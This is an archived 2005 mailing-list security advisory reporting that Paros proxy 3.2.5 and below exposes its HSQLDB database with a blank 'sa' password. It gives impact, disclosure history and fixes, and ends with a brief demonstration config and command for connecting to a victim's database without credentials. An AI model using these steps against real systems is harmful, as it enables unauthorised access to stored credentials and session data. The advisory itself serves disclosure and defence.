| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <OF6EE738A3.06AAB0EA-ONC125709F.004C57D9-C125709F.004E3377@fortconsult.net>
Date: Wed, 19 Oct 2005 16:14:03 +0200
From: Andrew Christensen <anc@...tconsult.net>
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: paros proxy v3.2.5 and below blank "sa" password
Title: Paros proxy 3.2.5 and below blank "sa" database password
Summary:
Paros is an intercepting HTTP/HTTPS proxy for use in security
testing web applications.
Paros version 3.2.5 and below may contain a flaw where a remote
attacker can connect to a
database port opened on the machine running Paros, without
supplying any credentials.
The problem stems from use of a blank "sa" password on the
open-source database ("HSQLDB")
which is integrated with Paros.
The database server (which is written in Java) contains
functionality for executing arbitrary Java
statements. This is how HSQLDB provides Stored Procedure
functionality.
Impact of successful exploitation:
The issue may result in disclosure of confidential data, and
possible execution of commands on
the victim machine.
A remote attacker may find credentials for web applications, valid
session IDs, and confidential
data downloaded from the website being tested with Paros. This
information is is present in the
database.
Additionally, the possibility of executing Java statements on the
database server may mean that
an attacker can gain access to files or execute command at the OS
level (by performing the
Java equivalent of a "system()" call). This has not been
investigated fully, but appears possible.
History:
The overall time-to-correction was EXCEEDINGLY fast:
October 3rd 2005: Problem discovered / reported
October 7th 2005: Issue re-reported via sourceforge, as mail
appeared lost in transit
October 7th 2005: Paros developer releases updated version
where DB listes on localhost only
Countermeasures:
Upgrade to version 3.2.6.
Firewall the host running Paros.
Demonstration:
To demonstrate this, first start Paros on the victim host (here,
192.168.0.1).
On the attacking host, ensure HSQLDB is installed, and add the following
lines to the file
$HOME/sqltool.rc on the attacking host:
# connect to victimhost as sa, victimhost has IP 192.168.0.1
urlid victimhost-sa
url: jbdc:hsqldb:hsql://192.168.0.1
username sa
password
To connect using the "victimhost-sa" block above run:
java -jar $HSQLDB_HOME/jsqldb.jar victimhost-sa
At this point, it is possible to pull data from the tables in the database
(browsing state, history, credentials).
The page at http://hsqldb.org/doc/guide/ch09.html#call-section also states
it is possible to execute Java statements
by writing them in the format "java.lang.Math.sqrt"(2.0).
Andrew Christensen
FortConsult ApS
Tranevej 16-18
2400 København NV
tlf. (+45) 7020 7525
www.fortconsult.net
FortConsult er som de første i Skandinavien blevet certificeret af VISA og
MasterCard til at udføre sikkerhedsgennemgange af virksomheders kritiske
betalingssystemer.
FortConsult is the only Scandinavian firm certified by VISA to perform
security audits on critical card-payment systems.
Content of type "text/html" skipped
Download attachment "smime.p7s" of type "application/x-pkcs7-signature" (5730 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists